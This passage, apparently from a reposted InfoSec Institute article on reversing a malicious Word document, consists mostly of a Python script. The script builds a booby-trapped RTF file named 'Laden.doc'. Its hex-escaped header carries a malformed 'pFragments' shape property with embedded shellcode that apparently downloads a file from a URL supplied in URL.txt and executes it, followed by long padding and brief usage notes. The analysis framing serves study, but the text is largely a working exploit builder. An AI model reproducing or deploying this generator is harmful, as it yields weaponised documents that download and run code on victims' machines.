"\x6E\x6F\x66\x77\x6F\x72\x64\x73\x31\x7D\x7B\x5C\x6E\x6F\x66\x63" "\x68\x61\x72\x73\x39\x7D\x7B\x5C\x2A\x5C\x63\x6F\x6D\x70\x61\x6E" "\x79\x20\x43\x48\x49\x4E\x41\x7D\x7B\x5C\x6E\x6F\x66\x63\x68\x61" "\x72\x73\x77\x73\x39\x7D\x7B\x5C\x76\x65\x72\x6E\x32\x34\x36\x31" "\x33\x7D\x7B\x5C\x2A\x5C\x70\x61\x73\x73\x77\x6F\x72\x64\x20\x30" "\x30\x30\x30\x30\x30\x30\x30\x7D\x7D\x7B\x5C\x2A\x5C\x78\x6D\x6C" "\x6E\x73\x74\x62\x6C\x20\x7B\x5C\x78\x6D\x6C\x6E\x73\x31\x20\x68" "\x74\x74\x70\x3A\x2F\x2F\x73\x63\x68\x65\x6D\x61\x73\x2E\x6D\x69" "\x63\x72\x6F\x73\x6F\x66\x74\x2E\x63\x6F\x6D\x2F\x6F\x66\x66\x69" "\x63\x65\x2F\x77\x6F\x72\x64\x2F\x32\x30\x30\x33\x2F\x77\x6F\x72" "\x64\x6D\x6C\x7D\x7D\x0D\x0A\x5C\x70\x61\x70\x65\x72\x77\x31\x31" "\x39\x30\x36\x5C\x70\x61\x70\x65\x72\x68\x31\x36\x38\x33\x38\x5C" "\x6D\x61\x72\x67\x6C\x31\x38\x30\x30\x5C\x6D\x61\x72\x67\x72\x31" "\x38\x30\x30\x5C\x6D\x61\x72\x67\x74\x31\x34\x34\x30\x5C\x6D\x61" "\x72\x67\x62\x31\x34\x34\x30\x5C\x67\x75\x74\x74\x65\x72\x30\x5C" "\x6C\x74\x72\x73\x65\x63\x74\x20\x0D\x0A\x5C\x64\x65\x66\x74\x61" "\x62\x34\x32\x30\x5C\x66\x74\x6E\x62\x6A\x5C\x61\x65\x6E\x64\x64" "\x6F\x63\x5C\x64\x6F\x6E\x6F\x74\x65\x6D\x62\x65\x64\x73\x79\x73" "\x66\x6F\x6E\x74\x31\x5C\x64\x6F\x6E\x6F\x74\x65\x6D\x62\x65\x64" "\x6C\x69\x6E\x67\x64\x61\x74\x61\x30\x5C\x67\x72\x66\x64\x6F\x63" "\x65\x76\x65\x6E\x74\x73\x30\x5C\x76\x61\x6C\x69\x64\x61\x74\x65" "\x78\x6D\x6C\x31\x5C\x73\x68\x6F\x77\x70\x6C\x61\x63\x65\x68\x6F" "\x6C\x64\x74\x65\x78\x74\x30\x5C\x69\x67\x6E\x6F\x72\x65\x6D\x69" "\x78\x65\x64\x63\x6F\x6E\x74\x65\x6E\x74\x30\x5C\x73\x61\x76\x65" "\x69\x6E\x76\x61\x6C\x69\x64\x78\x6D\x6C\x30\x5C\x73\x68\x6F\x77" "\x78\x6D\x6C\x65\x72\x72\x6F\x72\x73\x31\x5C\x66\x6F\x72\x6D\x73" "\x68\x61\x64\x65\x5C\x68\x6F\x72\x7A\x64\x6F\x63\x5C\x64\x67\x6D" "\x61\x72\x67\x69\x6E\x5C\x64\x67\x68\x73\x70\x61\x63\x65\x31\x38" "\x30\x5C\x64\x67\x76\x73\x70\x61\x63\x65\x31\x35\x36\x5C\x64\x67" "\x68\x6F\x72\x69\x67\x69\x6E\x31\x38\x30\x30\x5C\x64\x67\x76\x6F" "\x72\x69\x67\x69\x6E\x31\x34\x34\x30\x5C\x64\x67\x68\x73\x68\x6F" "\x77\x30\x0D\x0A\x5C\x64\x67\x76\x73\x68\x6F\x77\x32\x5C\x6A\x63" "\x6F\x6D\x70\x72\x65\x73\x73\x5C\x6C\x6E\x6F\x6E\x67\x72\x69\x64" "\x5C\x76\x69\x65\x77\x6B\x69\x6E\x64\x31\x5C\x76\x69\x65\x77\x73" "\x63\x61\x6C\x65\x31\x30\x30\x5C\x73\x70\x6C\x79\x74\x77\x6E\x69" "\x6E\x65\x5C\x66\x74\x6E\x6C\x79\x74\x77\x6E\x69\x6E\x65\x5C\x68" "\x74\x6D\x61\x75\x74\x73\x70\x5C\x75\x73\x65\x6C\x74\x62\x61\x6C" "\x6E\x5C\x61\x6C\x6E\x74\x62\x6C\x69\x6E\x64\x5C\x6C\x79\x74\x63" "\x61\x6C\x63\x74\x62\x6C\x77\x64\x5C\x6C\x79\x74\x74\x62\x6C\x72" "\x74\x67\x72\x5C\x6C\x6E\x62\x72\x6B\x72\x75\x6C\x65\x5C\x6E\x6F" "\x62\x72\x6B\x77\x72\x70\x74\x62\x6C\x5C\x76\x69\x65\x77\x6E\x6F" "\x62\x6F\x75\x6E\x64\x31\x5C\x73\x6E\x61\x70\x74\x6F\x67\x72\x69" "\x64\x69\x6E\x63\x65\x6C\x6C\x5C\x61\x6C\x6C\x6F\x77\x66\x69\x65" "\x6C\x64\x65\x6E\x64\x73\x65\x6C\x5C\x77\x72\x70\x70\x75\x6E\x63" "\x74\x5C\x61\x73\x69\x61\x6E\x62\x72\x6B\x72\x75\x6C\x65\x5C\x72" "\x73\x69\x64\x72\x6F\x6F\x74\x31\x35\x38\x30\x37\x35\x31\x39\x0D" "\x0A\x5C\x6E\x65\x77\x74\x62\x6C\x73\x74\x79\x72\x75\x6C\x73\x5C" "\x6E\x6F\x67\x72\x6F\x77\x61\x75\x74\x6F\x66\x69\x74\x20\x7B\x5C" "\x2A\x5C\x66\x63\x68\x61\x72\x73\x20\x0D\x0A\x21\x29\x2C\x2E\x3A" "\x5C\x27\x33\x62\x3F\x5D\x5C\x27\x37\x64\x5C\x27\x61\x31\x5C\x27" "\x61\x37\x5C\x27\x61\x31\x5C\x27\x61\x34\x5C\x27\x61\x31\x5C\x27" "\x61\x36\x5C\x27\x61\x31\x5C\x27\x61\x35\x5C\x27\x61\x38\x5C\x27" "\x34\x34\x5C\x27\x61\x31\x5C\x27\x61\x63\x5C\x27\x61\x31\x5C\x27" "\x61\x66\x5C\x27\x61\x31\x5C\x27\x62\x31\x5C\x27\x61\x31\x5C\x27" "\x61\x64\x5C\x27\x61\x31\x5C\x27\x63\x33\x5C\x27\x61\x31\x5C\x27" "\x61\x32\x5C\x27\x61\x31\x5C\x27\x61\x33\x5C\x27\x61\x31\x5C\x27" "\x61\x38\x5C\x27\x61\x31\x5C\x27\x61\x39\x5C\x27\x61\x31\x5C\x27" "\x62\x35\x5C\x27\x61\x31\x5C\x27\x62\x37\x5C\x27\x61\x31\x5C\x27" "\x62\x39\x5C\x27\x61\x31\x5C\x27\x62\x62\x5C\x27\x61\x31\x5C\x27" "\x62\x66\x5C\x27\x61\x31\x5C\x27\x62\x33\x5C\x27\x61\x31\x5C\x27" "\x62\x64\x5C\x27\x61\x33\x5C\x27\x61\x31\x5C\x27\x61\x33\x5C\x27" "\x61\x32\x5C\x27\x61\x33\x5C\x27\x61\x37\x5C\x27\x61\x33\x5C\x27" "\x61\x39\x5C\x27\x61\x33\x5C\x27\x61\x63\x5C\x27\x61\x33\x5C\x27" "\x61\x65\x5C\x27\x61\x33\x5C\x27\x62\x61\x5C\x27\x61\x33\x5C\x27" "\x62\x62\x5C\x27\x61\x33\x5C\x27\x62\x66\x5C\x27\x61\x33\x5C\x27" "\x64\x64\x5C\x27\x61\x33\x5C\x27\x65\x30\x5C\x27\x61\x33\x5C\x27" "\x66\x63\x5C\x27\x61\x33\x5C\x27\x66\x64\x5C\x27\x61\x31\x5C\x27" "\x61\x62\x5C\x27\x61\x31\x5C\x27\x65\x39\x0D\x0A\x7D\x7B\x5C\x2A" "\x5C\x6C\x63\x68\x61\x72\x73\x20\x28\x5B\x5C\x27\x37\x62\x5C\x27" "\x61\x31\x5C\x27\x61\x34\x5C\x27\x61\x31\x5C\x27\x61\x65\x5C\x27" "\x61\x31\x5C\x27\x62\x30\x5C\x27\x61\x31\x5C\x27\x62\x34\x5C\x27" "\x61\x31\x5C\x27\x62\x36\x5C\x27\x61\x31\x5C\x27\x62\x38\x5C\x27" "\x61\x31\x5C\x27\x62\x61\x5C\x27\x61\x31\x5C\x27\x62\x65\x5C\x27" "\x61\x31\x5C\x27\x62\x32\x5C\x27\x61\x31\x5C\x27\x62\x63\x5C\x27" "\x61\x33\x5C\x27\x61\x38\x5C\x27\x61\x33\x5C\x27\x61\x65\x5C\x27" "\x61\x33\x5C\x27\x64\x62\x5C\x27\x61\x33\x5C\x27\x66\x62\x5C\x27" "\x61\x31\x5C\x27\x65\x61\x5C\x27\x61\x33\x5C\x27\x61\x34\x7D\x5C" "\x66\x65\x74\x30\x7B\x5C\x2A\x5C\x77\x67\x72\x66\x66\x6D\x74\x66" "\x69\x6C\x74\x65\x72\x20\x30\x31\x33\x66\x7D\x5C\x69\x6C\x66\x6F" "\x6D\x61\x63\x61\x74\x63\x6C\x6E\x75\x70\x30\x5C\x6C\x74\x72\x70" "\x61\x72\x20\x5C\x73\x65\x63\x74\x64\x20\x5C\x6C\x74\x72\x73\x65" "\x63\x74\x0D\x0A\x5C\x6C\x69\x6E\x65\x78\x30\x5C\x68\x65\x61\x64" "\x65\x72\x79\x38\x35\x31\x5C\x66\x6F\x6F\x74\x65\x72\x79\x39\x39" "\x32\x5C\x63\x6F\x6C\x73\x78\x34\x32\x35\x5C\x65\x6E\x64\x6E\x68" "\x65\x72\x65\x5C\x73\x65\x63\x74\x6C\x69\x6E\x65\x67\x72\x69\x64" "\x33\x31\x32\x5C\x73\x65\x63\x74\x73\x70\x65\x63\x69\x66\x79\x6C" "\x5C\x73\x66\x74\x6E\x62\x6A\x20\x7B\x5C\x2A\x5C\x70\x6E\x73\x65" "\x63\x6C\x76\x6C\x31\x5C\x70\x6E\x75\x63\x72\x6D\x5C\x70\x6E\x73" "\x74\x61\x72\x74\x31\x5C\x70\x6E\x69\x6E\x64\x65\x6E\x74\x37\x32" "\x30\x5C\x70\x6E\x68\x61\x6E\x67\x20\x7B\x5C\x70\x6E\x74\x78\x74" "\x61\x20\x5C\x64\x62\x63\x68\x20\x2E\x7D\x7D\x7B\x5C\x2A\x5C\x70" "\x6E\x73\x65\x63\x6C\x76\x6C\x32\x5C\x70\x6E\x75\x63\x6C\x74\x72" "\x5C\x70\x6E\x73\x74\x61\x72\x74\x31\x5C\x70\x6E\x69\x6E\x64\x65" "\x6E\x74\x37\x32\x30\x5C\x70\x6E\x68\x61\x6E\x67\x20\x7B\x5C\x70" "\x6E\x74\x78\x74\x61\x20\x5C\x64\x62\x63\x68\x20\x2E\x7D\x7D\x7B" "\x5C\x2A\x5C\x70\x6E\x73\x65\x63\x6C\x76\x6C\x33\x0D\x0A\x5C\x70" "\x6E\x64\x65\x63\x5C\x70\x6E\x73\x74\x61\x72\x74\x31\x5C\x70\x6E" "\x69\x6E\x64\x65\x6E\x74\x37\x32\x30\x5C\x70\x6E\x68\x61\x6E\x67" "\x20\x7B\x5C\x70\x6E\x74\x78\x74\x61\x20\x5C\x64\x62\x63\x68\x20" "\x2E\x7D\x7D\x7B\x5C\x2A\x5C\x70\x6E\x73\x65\x63\x6C\x76\x6C\x34" "\x5C\x70\x6E\x6C\x63\x6C\x74\x72\x5C\x70\x6E\x73\x74\x61\x72\x74" "\x31\x5C\x70\x6E\x69\x6E\x64\x65\x6E\x74\x37\x32\x30\x5C\x70\x6E" "\x68\x61\x6E\x67\x20\x7B\x5C\x70\x6E\x74\x78\x74\x61\x20\x5C\x64" "\x62\x63\x68\x20\x29\x7D\x7D\x7B\x5C\x2A\x5C\x70\x6E\x73\x65\x63" "\x6C\x76\x6C\x35\x5C\x70\x6E\x64\x65\x63\x5C\x70\x6E\x73\x74\x61" "\x72\x74\x31\x5C\x70\x6E\x69\x6E\x64\x65\x6E\x74\x37\x32\x30\x5C" "\x70\x6E\x68\x61\x6E\x67\x20\x7B\x5C\x70\x6E\x74\x78\x74\x62\x20" "\x5C\x64\x62\x63\x68\x20\x28\x7D\x7B\x5C\x70\x6E\x74\x78\x74\x61" "\x20\x5C\x64\x62\x63\x68\x20\x29\x7D\x7D\x7B\x5C\x2A\x5C\x70\x6E" "\x73\x65\x63\x6C\x76\x6C\x36\x5C\x70\x6E\x6C\x63\x6C\x74\x72\x5C" "\x70\x6E\x73\x74\x61\x72\x74\x31\x5C\x70\x6E\x69\x6E\x64\x65\x6E" "\x74\x37\x32\x30\x5C\x70\x6E\x68\x61\x6E\x67\x20\x0D\x0A\x7B\x5C" "\x70\x6E\x74\x78\x74\x62\x20\x5C\x64\x62\x63\x68\x20\x28\x7D\x7B" "\x5C\x70\x6E\x74\x78\x74\x61\x20\x5C\x64\x62\x63\x68\x20\x29\x7D" "\x7D\x7B\x5C\x2A\x5C\x70\x6E\x73\x65\x63\x6C\x76\x6C\x37\x5C\x70" "\x6E\x6C\x63\x72\x6D\x5C\x70\x6E\x73\x74\x61\x72\x74\x31\x5C\x70" "\x6E\x69\x6E\x64\x65\x6E\x74\x37\x32\x30\x5C\x70\x6E\x68\x61\x6E" "\x67\x20\x7B\x5C\x70\x6E\x74\x78\x74\x62\x20\x5C\x64\x62\x63\x68" "\x20\x28\x7D\x7B\x5C\x70\x6E\x74\x78\x74\x61\x20\x5C\x64\x62\x63" "\x68\x20\x29\x7D\x7D\x7B\x5C\x2A\x5C\x70\x6E\x73\x65\x63\x6C\x76" "\x6C\x38\x5C\x70\x6E\x6C\x63\x6C\x74\x72\x5C\x70\x6E\x73\x74\x61" "\x72\x74\x31\x5C\x70\x6E\x69\x6E\x64\x65\x6E\x74\x37\x32\x30\x5C" "\x70\x6E\x68\x61\x6E\x67\x20\x7B\x5C\x70\x6E\x74\x78\x74\x62\x20" "\x5C\x64\x62\x63\x68\x20\x28\x7D\x7B\x5C\x70\x6E\x74\x78\x74\x61" "\x20\x5C\x64\x62\x63\x68\x20\x29\x7D\x7D\x7B\x5C\x2A\x5C\x70\x6E" "\x73\x65\x63\x6C\x76\x6C\x39\x5C\x70\x6E\x6C\x63\x72\x6D\x5C\x70" "\x6E\x73\x74\x61\x72\x74\x31\x5C\x70\x6E\x69\x6E\x64\x65\x6E\x74" "\x37\x32\x30\x5C\x70\x6E\x68\x61\x6E\x67\x20\x0D\x0A\x7B\x5C\x70" "\x6E\x74\x78\x74\x62\x20\x5C\x64\x62\x63\x68\x20\x28\x7D\x7B\x5C" "\x70\x6E\x74\x78\x74\x61\x20\x5C\x64\x62\x63\x68\x20\x29\x7D\x7D" "\x5C\x70\x61\x72\x64\x5C\x70\x6C\x61\x69\x6E\x20\x5C\x6C\x74\x72" "\x70\x61\x72\x5C\x71\x6A\x20\x5C\x6C\x69\x30\x5C\x72\x69\x30\x5C" "\x6E\x6F\x77\x69\x64\x63\x74\x6C\x70\x61\x72\x5C\x77\x72\x61\x70" "\x64\x65\x66\x61\x75\x6C\x74\x5C\x61\x73\x70\x61\x6C\x70\x68\x61" "\x5C\x61\x73\x70\x6E\x75\x6D\x5C\x66\x61\x61\x75\x74\x6F\x5C\x61" "\x64\x6A\x75\x73\x74\x72\x69\x67\x68\x74\x5C\x72\x69\x6E\x30\x5C" "\x6C\x69\x6E\x30\x5C\x69\x74\x61\x70\x30\x20\x5C\x72\x74\x6C\x63" "\x68\x5C\x66\x63\x73\x31\x20\x5C\x61\x66\x30\x5C\x61\x66\x73\x32" "\x34\x5C\x61\x6C\x61\x6E\x67\x31\x30\x32\x35\x20\x5C\x6C\x74\x72" "\x63\x68\x5C\x66\x63\x73\x30\x20\x0D\x0A\x5C\x66\x73\x32\x31\x5C" "\x6C\x61\x6E\x67\x31\x30\x33\x33\x5C\x6C\x61\x6E\x67\x66\x65\x32" "\x30\x35\x32\x5C\x6B\x65\x72\x6E\x69\x6E\x67\x32\x5C\x6C\x6F\x63" "\x68\x5C\x61\x66\x30\x5C\x68\x69\x63\x68\x5C\x61\x66\x30\x5C\x64" "\x62\x63\x68\x5C\x61\x66\x31\x33\x5C\x63\x67\x72\x69\x64\x5C\x6C" "\x61\x6E\x67\x6E\x70\x31\x30\x33\x33\x5C\x6C\x61\x6E\x67\x66\x65" "\x6E\x70\x32\x30\x35\x32\x20\x7B\x5C\x72\x74\x6C\x63\x68\x5C\x66" "\x63\x73\x31\x20\x5C\x61\x66\x30\x20\x5C\x6C\x74\x72\x63\x68\x5C" "\x66\x63\x73\x30\x20\x5C\x69\x6E\x73\x72\x73\x69\x64\x31\x35\x38" "\x30\x37\x35\x31\x39\x20\x5C\x68\x69\x63\x68\x5C\x61\x66\x30\x5C" "\x64\x62\x63\x68\x5C\x61\x66\x31\x33\x5C\x6C\x6F\x63\x68\x5C\x66" "\x30\x20\x46\x7D\x7B\x5C\x72\x74\x6C\x63\x68\x5C\x66\x63\x73\x31" "\x20\x5C\x61\x66\x30\x20\x5C\x6C\x74\x72\x63\x68\x5C\x66\x63\x73" "\x30\x20\x5C\x69\x6E\x73\x72\x73\x69\x64\x31\x35\x38\x30\x37\x35" "\x31\x39\x20\x5C\x68\x69\x63\x68\x5C\x61\x66\x30\x5C\x64\x62\x63" "\x68\x5C\x61\x66\x31\x33\x5C\x6C\x6F\x63\x68\x7D\x7B\x5C\x73\x68" "\x70\x7B\x5C\x73\x70\x7B\x5C\x73\x6E\x31\x09\x70\x66\x52\x61\x47" "\x4D\x65\x4E\x54\x73\x7D\x7B\x5C\x73\x76\x20\x31\x3B\x31\x3B\x30" "\x31\x31\x31\x31\x31\x31\x31\x66\x66\x30\x33\x30\x30\x30\x30\x30" "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" "\x30\x30\x30\x32\x66\x39\x30\x39\x33\x37\x38\x30\x30\x30\x30\x38" "\x30\x37\x63\x30\x30\x30\x30\x38\x30\x37\x63\x42\x42\x42\x42\x42" "\x42\x42\x42\x43\x43\x43\x43\x43\x43\x43\x43\x44\x44\x44\x44\x44" "\x44\x44\x44\x39\x30\x39\x30\x65\x62\x37\x31\x33\x31\x63\x39\x36" "\x34\x38\x62\x37\x31\x33\x30\x38\x62\x37\x36\x30\x63\x38\x62\x37" "\x36\x31\x63\x38\x62\x35\x65\x30\x38\x38\x62\x37\x65\x32\x30\x38" "\x62\x33\x36\x36\x36\x33\x39\x34\x66\x31\x38\x37\x35\x66\x32\x63" "\x33\x36\x30\x38\x62\x36\x63\x32\x34\x32\x34\x38\x62\x34\x35\x33" "\x63\x38\x62\x35\x34\x32\x38\x37\x38\x30\x31\x65\x61\x38\x62\x34" "\x61\x31\x38\x38\x62\x35\x61\x32\x30\x30\x31\x65\x62\x65\x33\x33" "\x34\x34\x39\x38\x62\x33\x34\x38\x62\x30\x31\x65\x65\x33\x31\x66" "\x66\x33\x31\x63\x30\x66\x63\x61\x63\x38\x34\x63\x30\x37\x34\x30" "\x37\x63\x31\x63\x66\x30\x64\x30\x31\x63\x37\x65\x62\x66\x34\x33" "\x62\x37\x63\x32\x34\x32\x38\x37\x35\x65\x31\x38\x62\x35\x61\x32" "\x34\x30\x31\x65\x62\x36\x36\x38\x62\x30\x63\x34\x62\x38\x62\x35" "\x61\x31\x63\x30\x31\x65\x62\x38\x62\x30\x34\x38\x62\x30\x31\x65" "\x38\x38\x39\x34\x34\x32\x34\x31\x63\x36\x31\x63\x33\x65\x38\x39" "\x32\x66\x66\x66\x66\x66\x66\x35\x64\x65\x62\x30\x35\x65\x38\x66" "\x33\x66\x66\x66\x66\x66\x66\x38\x39\x65\x66\x38\x33\x65\x66\x38" "\x39\x38\x39\x65\x65\x38\x33\x65\x65\x39\x35\x38\x31\x65\x64\x34" "\x35\x66\x66\x66\x66\x66\x66\x36\x38\x33\x33\x63\x61\x38\x61\x35" "\x62\x35\x33\x65\x38\x38\x61\x66\x66\x66\x66\x66\x66\x35\x35\x36" "\x61\x36\x34\x66\x66\x64\x30\x35\x37\x38\x39\x63\x37\x30\x31\x65" "\x66\x61\x34\x38\x30\x37\x66\x66\x66\x30\x30\x37\x35\x66\x39\x35" "\x66\x36\x38\x38\x65\x34\x65\x30\x65\x65\x63\x35\x33\x65\x38\x36" "\x64\x66\x66\x66\x66\x66\x66\x33\x31\x63\x39\x36\x36\x62\x39\x36" "\x66\x36\x65\x35\x31\x36\x38\x37\x35\x37\x32\x36\x63\x36\x64\x35" "\x34\x66\x66\x64\x30\x36\x38\x33\x36\x31\x61\x32\x66\x37\x30\x35" "\x30\x65\x38\x35\x33\x66\x66\x66\x66\x66\x66\x33\x31\x63\x39\x35" "\x31\x35\x31\x35\x35\x35\x37\x35\x31\x66\x66\x64\x30\x36\x38\x39" "\x38\x66\x65\x38\x61\x30\x65\x35\x33\x65\x38\x33\x66\x66\x66\x66" "\x66\x66\x66\x34\x31\x35\x31\x35\x35\x66\x66\x64\x30\x37\x33\x37" "\x36\x36\x33\x36\x38\x36\x66\x37\x33\x37\x34\x32\x65\x36\x35\x37" "\x38\x36\x35\x30\x30") footer =("\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x7D\x7D\x7D\x7D" ) url="" ul = open("URL.txt",'rb') sr = ul.read() for i in range(0,len(sr)): a = ord(sr[i]) url += "%02x" % a url +="\x30"*2 payload = header + url + footer file = open("Laden.doc",'wb') file.write(header + url + footer) file.close() os.rename("Laden.doc",st) URL.txt contains the actual URL from where one has to download calc. This URL.txt file should be in the same folder where the creator file will be. You can also embed the direct text string of the URL in the creator file. One more point: reversing the exploit sample will vary from exploit to exploit. It’s not that while reversing another sample you will always apply the same process, but in 80% of the cases, it’s what I explain above. Sursa: InfoSec Institute Resources – Reversing a Malicious Word Document

